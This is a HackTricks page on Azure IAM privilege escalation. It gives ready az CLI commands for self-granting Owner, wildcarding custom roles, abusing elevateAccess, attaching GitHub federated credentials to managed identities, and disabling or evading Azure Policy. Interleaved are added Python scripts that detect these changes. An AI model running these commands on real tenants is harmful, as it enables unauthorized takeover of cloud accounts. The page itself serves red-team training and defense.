Az - Azure IAM Privesc (Authorization)
Tip
Learn & practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the Telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repos.
Azure IAM
For more information, see:
Az - Entra ID (AzureAD) & Azure IAM
Microsoft.Authorization/roleAssignments/write
This permission allows assigning roles to principals within a given scope, so an attacker can escalate privileges by assigning themselves a more privileged role:
# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
Microsoft.Authorization/roleDefinitions/Write
This permission allows modifying the permissions granted by a role, so an attacker can escalate privileges by granting additional permissions to a role that is already assigned to them.
Create a file role.json with the following content:
{
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}
Then update the role's permissions using the definition above:
az role definition update --role-definition role.json
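From the defender's side, the roleDefinitions/write and roleAssignments/write paths above both show up as a role document that suddenly carries wildcards or IAM-writing operations. The following added example (not code from the original page or from HackTricks) audits a role definition of the role.json shape for those traits and diffs a "before" and "after" version to report which probed operations the update newly permits. BEFORE, AFTER and PROBES are constructed samples, and fnmatch is used as a simplification of Azure's `*` pattern matching.

```python
"""Audit a custom role definition (the role.json shape above) for privilege
expansion.

Added example, not part of the original page. BEFORE/AFTER are constructed
samples of one role before and after an update; wildcard matching uses
fnmatch as a simplification of Azure's '*' pattern semantics.
"""
import fnmatch

BEFORE = {  # constructed: a narrow custom role
    "roleName": "vault-reader",
    "IsCustom": True,
    "Actions": ["Microsoft.KeyVault/vaults/read"],
    "NotActions": [],
    "DataActions": [],
    "NotDataActions": [],
    "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-1"],
}

AFTER = {  # constructed: the same role after a suspicious update, everything wildcarded
    "roleName": "vault-reader",
    "IsCustom": True,
    "Actions": ["*"],
    "NotActions": [],
    "DataActions": ["*"],
    "NotDataActions": [],
    "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000000"],
}

# Control-plane operations whose presence in a role lets the holder rewrite IAM.
IAM_WRITE_OPS = (
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Authorization/elevateAccess/action",
)


def permits(role, kind, operation):
    """True if `operation` matches an allow pattern in `kind` ('Actions' or
    'DataActions') and no pattern in the matching Not* list (case-insensitive)."""
    op = operation.lower()
    allowed = any(fnmatch.fnmatchcase(op, p.lower()) for p in role.get(kind, []))
    denied = any(fnmatch.fnmatchcase(op, p.lower()) for p in role.get("Not" + kind, []))
    return allowed and not denied


def findings(role):
    """Static findings about a single role definition document."""
    out = []
    for kind in ("Actions", "DataActions"):
        if any(p.strip() == "*" for p in role.get(kind, [])):
            out.append(f"wildcard {kind}")
    for op in IAM_WRITE_OPS:
        if permits(role, "Actions", op):
            out.append(f"grants {op}")
    for scope in role.get("AssignableScopes", []):
        s = scope.lower()
        if s.rstrip("/") == "" or s.startswith("/providers/microsoft.management/"):
            out.append(f"assignable at tenant or management-group scope: {scope}")
    return out


def widened(before, after, probes):
    """Operations from `probes` that the new version permits but the old did not."""
    return [op for op in probes
            if permits(after, "Actions", op) and not permits(before, "Actions", op)]


PROBES = (  # constructed list of operations worth watching for
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.KeyVault/vaults/read",
    "Microsoft.Compute/virtualMachines/write",
)

if __name__ == "__main__":
    print("before:", findings(BEFORE))
    print("after:", findings(AFTER))
    print("widened:", widened(BEFORE, AFTER, PROBES))
```

Run it against the output of `az role definition list --custom-role-only true` (one document per role) and keep the previous run's documents as the `before` side; any non-empty `widened` result for an IAM-writing operation deserves a look.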
Microsoft.Authorization/elevateAccess/action
This permission allows elevating access so that the holder can assign permissions to any principal over Azure resources. It is intended for Entra ID Global Administrators, so that they can also manage permissions over Azure resources.
Tip
I think the user needs to be a Global Administrator in Entra ID for the elevate call to work.
# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
# Grant a user the Owner role
az role assignment create --assignee "<object-id>" --role "Owner" --scope "/"
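Both steps above leave a distinctive trail in the Azure Activity Log: an elevateAccess operation, followed by a roleAssignments/write at the root scope "/" whose principal is the caller itself. The following added example (not code from the original page or from HackTricks) triages a batch of such events. EVENTS are constructed samples in a simplified Activity Log shape (operationName, callerObjectId, resourceId, requestbody); the two role-definition GUIDs are the well-known built-in Owner and User Access Administrator ids, and all other ids are made up.

```python
"""Triage Azure Activity Log events for the elevateAccess call and for
root-scope or self-granted Owner assignments described above.

Added example, not part of the original page. EVENTS are constructed samples
in a simplified Activity Log shape; the two role-definition GUIDs are the
well-known built-in Owner and User Access Administrator ids.
"""
import json
import re

OWNER = "8e3af657-a8ff-443c-a75c-2fe8c4bcb635"
USER_ACCESS_ADMIN = "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9"
HIGH_PRIV_ROLES = {OWNER, USER_ACCESS_ADMIN}

CALLER_A = "aaaaaaaa-0000-0000-0000-000000000001"  # constructed caller object id
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"  # constructed

EVENTS = [  # constructed samples
    {
        "operationName": "Microsoft.Authorization/elevateAccess/action",
        "callerObjectId": CALLER_A,
        "resourceId": "/providers/Microsoft.Authorization",
        "requestbody": "",
    },
    {   # Owner granted at "/" by the same caller, to itself
        "operationName": "Microsoft.Authorization/roleAssignments/write",
        "callerObjectId": CALLER_A,
        "resourceId": "/providers/Microsoft.Authorization/roleAssignments/bbbbbbbb-0000-0000-0000-000000000002",
        "requestbody": json.dumps({"properties": {
            "roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/" + OWNER,
            "principalId": CALLER_A,
            "scope": "/"}}),
    },
    {   # benign: a custom role (constructed id) granted at resource-group scope to someone else
        "operationName": "Microsoft.Authorization/roleAssignments/write",
        "callerObjectId": "cccccccc-0000-0000-0000-000000000003",
        "resourceId": SUB + "/resourceGroups/rg-app/providers/Microsoft.Authorization/roleAssignments/dddddddd-0000-0000-0000-000000000004",
        "requestbody": json.dumps({"properties": {
            "roleDefinitionId": SUB + "/providers/Microsoft.Authorization/roleDefinitions/ffffffff-0000-0000-0000-000000000006",
            "principalId": "eeeeeeee-0000-0000-0000-000000000005",
            "scope": SUB + "/resourceGroups/rg-app"}}),
    },
]


def scope_level(scope):
    """Classify an ARM scope string as root, managementGroup, subscription,
    resourceGroup or resource."""
    s = scope.rstrip("/").lower()
    if s == "":
        return "root"
    if s.startswith("/providers/microsoft.management/managementgroups"):
        return "managementGroup"
    parts = s.strip("/").split("/")
    if len(parts) == 2 and parts[0] == "subscriptions":
        return "subscription"
    if len(parts) == 4 and parts[2] == "resourcegroups":
        return "resourceGroup"
    return "resource"


def analyze(event):
    """Return a list of (severity, reason) findings for one event."""
    op = event["operationName"].lower()
    if op == "microsoft.authorization/elevateaccess/action":
        return [("critical", "elevateAccess called by " + event["callerObjectId"])]
    if op != "microsoft.authorization/roleassignments/write":
        return []
    props = json.loads(event["requestbody"] or "{}").get("properties", {})
    role_id = props.get("roleDefinitionId", "").rsplit("/", 1)[-1].lower()
    # Scope comes from the body; fall back to the resourceId prefix ("" means root).
    scope = props.get("scope") or re.split(
        r"/providers/microsoft\.authorization/roleassignments",
        event["resourceId"], flags=re.IGNORECASE)[0] or "/"
    level = scope_level(scope)
    out = []
    if props.get("principalId", "").lower() == event["callerObjectId"].lower():
        out.append(("high", "caller assigned a role to itself"))
    if role_id in HIGH_PRIV_ROLES and level in ("root", "managementGroup", "subscription"):
        out.append(("high", f"Owner/UAA assigned at {level} scope {scope!r}"))
    return out


def triage(events):
    """(event index, finding) pairs for a whole batch of events."""
    return [(i, f) for i, e in enumerate(events) for f in analyze(e)]


if __name__ == "__main__":
    for i, f in triage(EVENTS):
        print(i, *f)
```

The same rules translate directly into a KQL alert over the AzureActivity table; the point of the script is that an elevateAccess followed within minutes by a root-scope Owner assignment from the same object id is the whole technique, and either half alone is already rare enough to alert on.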
Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
This permission allows adding federated credentials to managed identities, for example granting GitHub Actions workflows of a given repo access to a managed identity. It therefore allows access to any user-assigned managed identity.
Example command to grant a GitHub repo access to a managed identity:
# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
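A federated credential is only as safe as its issuer, audience and subject, so a reviewer of these PUT bodies wants to know whether the subject points at a repo and branch the organisation actually owns. The following added example (not code from the original page or from HackTricks) validates a credential body against an allowlist. POLICY, GOOD and BAD are constructed; the issuer and audience strings and the `repo:<org>/<repo>:<claim>[:<value>]` subject grammar are those used in the requests above.

```python
"""Validate a federated identity credential body (the JSON PUT above)
against an allowlist of issuers, audiences, GitHub orgs and claims.

Added example, not part of the original page. POLICY and the sample bodies
are constructed.
"""
import re

# Constructed policy: which issuers, audiences, GitHub orgs and subject claims
# may obtain tokens for our managed identities.
POLICY = {
    "issuers": {"https://token.actions.githubusercontent.com"},
    "audiences": {"api://AzureADTokenExchange"},
    "github_orgs": {"example-org"},
    # claim type -> allowed values; claim types missing here (e.g. pull_request) are rejected
    "allowed_claims": {"ref": {"refs/heads/main"}, "environment": {"production"}},
}

# GitHub OIDC subject: repo:<org>/<repo>:<claim>[:<value>]
SUBJECT_RE = re.compile(
    r"^repo:(?P<org>[^/:]+)/(?P<repo>[^:]+):(?P<claim>[^:]+)(?::(?P<value>.+))?$")


def parse_github_subject(subject):
    """Split a GitHub subject into org/repo/claim/value, or None if malformed."""
    m = SUBJECT_RE.match(subject)
    return m.groupdict() if m else None


def evaluate(body, policy=POLICY):
    """Return a list of violations; an empty list means the credential is acceptable."""
    props = body.get("properties", {})
    problems = []
    issuer = props.get("issuer", "")
    if issuer not in policy["issuers"]:
        problems.append(f"untrusted issuer {issuer!r}")
    audiences = set(props.get("audiences", []))
    if not audiences or not audiences <= policy["audiences"]:
        problems.append(f"unexpected audiences {sorted(audiences)}")
    subject = props.get("subject", "")
    parsed = parse_github_subject(subject)
    if parsed is None:
        problems.append(f"unparseable subject {subject!r}")
        return problems
    if parsed["org"] not in policy["github_orgs"]:
        problems.append(f"GitHub org {parsed['org']!r} not allowlisted")
    allowed_values = policy["allowed_claims"].get(parsed["claim"])
    if allowed_values is None:
        problems.append(f"claim type {parsed['claim']!r} not allowed")
    elif parsed["value"] not in allowed_values:
        problems.append(f"{parsed['claim']}={parsed['value']!r} not allowlisted")
    return problems


GOOD = {"properties": {  # constructed: main branch of an owned repo
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:example-org/payments-api:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"]}}

BAD = {"properties": {  # constructed: pull_request claim from a foreign org
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:rogue-org/anything:pull_request",
    "audiences": ["api://AzureADTokenExchange"]}}

if __name__ == "__main__":
    print("good:", evaluate(GOOD))
    print("bad:", evaluate(BAD))
```

Feed it the objects returned by `az identity federated-credential list` for every user-assigned identity on a schedule; a credential that fails `evaluate` after having passed before is exactly the write this section describes.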
Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete
An attacker with the permission Microsoft.Authorization/policyAssignments/write or Microsoft.Authorization/policyAssignments/delete over a management group, subscription or resource group can modify or delete Azure policy assignments, potentially disabling security restrictions that block specific operations.
This would allow access to resources or features that were previously protected by the policy.
Delete a policy assignment:
az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
Disable a policy assignment:
az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled
Verify the changes:
# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
Microsoft.Authorization/policyDefinitions/write
An attacker with the permission Microsoft.Authorization/policyDefinitions/write can modify Azure policy definitions, changing the rules that control security restrictions across the whole environment.
For example, a policy that restricts the regions in which resources may be created could be modified to allow any region, or its effect could be changed so that it no longer applies.
Modify a policy definition:
az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json
Verify the changes:
az policy definition list --output table
az policy definition show --name "<policyDefinitionName>"
Microsoft.Management/managementGroups/write
An attacker with the permission Microsoft.Management/managementGroups/write can modify the management group hierarchy or create new management groups, potentially bypassing restrictive policies applied at higher levels.
For example, the attacker could create a new management group with no restrictive policies and then move a subscription into it.
Create a new management group:
az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"
Modify the management group hierarchy:
az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"
Verify the changes:
az account management-group list --output table
az account management-group show \
--name "<managementGroupId>" \
--expand
Microsoft.Management/managementGroups/subscriptions/write
An attacker with the permission Microsoft.Management/managementGroups/subscriptions/write can move subscriptions between management groups, potentially bypassing restrictive policies by moving a subscription into a group whose policies are more permissive or absent.
Move a subscription to a different management group:
az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"
Verify the changes:
az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"
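The four policy and management-group sections above share one defensive question: which policy assignments are still in force for a given subscription, and did that set shrink since the last snapshot? Deleting an assignment, flipping it to DoNotEnforce, or moving the subscription under a management group without the assignment all reduce the effective set. The following added example (not code from the original page or from HackTricks) computes the effective assignments per subscription by walking management-group inheritance and diffs two snapshots. BASELINE and CURRENT are constructed; they reduce each assignment to its scope, name and enforcementMode and each subscription to its parent management group, which is a simplification of what `az policy assignment list` and `az account management-group show --expand` return.

```python
"""Detect policy-assignment and management-group drift: assignments deleted or
set to DoNotEnforce, and subscriptions moved to a less restricted group.

Added example, not part of the original page. BASELINE and CURRENT are
constructed snapshots; 'mg_parents' maps a management group to its parent
(None for children of the tenant root), 'subscriptions' maps a subscription
to its parent management group.
"""

MG_PREFIX = "/providers/Microsoft.Management/managementGroups/"

BASELINE = {  # constructed
    "mg_parents": {"mg-prod": None, "mg-sandbox": None},
    "subscriptions": {"sub-1": "mg-prod", "sub-2": "mg-prod"},
    "assignments": [
        {"scope": MG_PREFIX + "mg-prod", "name": "allowed-locations", "enforcementMode": "Default"},
        {"scope": MG_PREFIX + "mg-prod", "name": "deny-public-ip", "enforcementMode": "Default"},
    ],
}

CURRENT = {  # constructed: new empty group, sub-1 moved into it, one assignment
              # deleted and the other no longer enforced
    "mg_parents": {"mg-prod": None, "mg-sandbox": None, "mg-new": None},
    "subscriptions": {"sub-1": "mg-new", "sub-2": "mg-prod"},
    "assignments": [
        {"scope": MG_PREFIX + "mg-prod", "name": "allowed-locations", "enforcementMode": "DoNotEnforce"},
    ],
}


def ancestors(mg, parents):
    """Management group ids from `mg` up to (but excluding) the tenant root."""
    out = []
    while mg is not None:
        out.append(mg)
        mg = parents.get(mg)
    return out


def effective(snapshot, sub):
    """{(scope, name): enforcementMode} in force for subscription `sub`,
    i.e. assignments at the subscription itself or any ancestor group."""
    scopes = {"/subscriptions/" + sub}
    scopes |= {MG_PREFIX + mg for mg in ancestors(snapshot["subscriptions"][sub], snapshot["mg_parents"])}
    return {(a["scope"], a["name"]): a.get("enforcementMode", "Default")
            for a in snapshot["assignments"] if a["scope"] in scopes}


def drift(baseline, current, sub):
    """Human-readable findings where `current` is weaker than `baseline` for `sub`."""
    before, after = effective(baseline, sub), effective(current, sub)
    findings = []
    old_parent, new_parent = baseline["subscriptions"][sub], current["subscriptions"][sub]
    if old_parent != new_parent:
        findings.append(f"{sub} moved from {old_parent} to {new_parent}")
    for (scope, name), mode in before.items():
        if (scope, name) not in after:
            findings.append(f"no longer in force for {sub}: {name} ({scope})")
        elif after[(scope, name)] != mode:
            findings.append(f"enforcement changed for {name}: {mode} -> {after[(scope, name)]}")
    return findings


def drift_all(baseline, current):
    """Findings for every subscription present in both snapshots."""
    subs = sorted(set(baseline["subscriptions"]) & set(current["subscriptions"]))
    return {s: drift(baseline, current, s) for s in subs}


if __name__ == "__main__":
    for sub, found in drift_all(BASELINE, CURRENT).items():
        for line in found:
            print(line)
```

Policy definition edits (the policyDefinitions/write section) are the one thing this diff does not see, because the assignment survives with the same name; store the definition's `policyRule` alongside each assignment and compare it too, or pin assignments to built-in definitions that an attacker cannot edit.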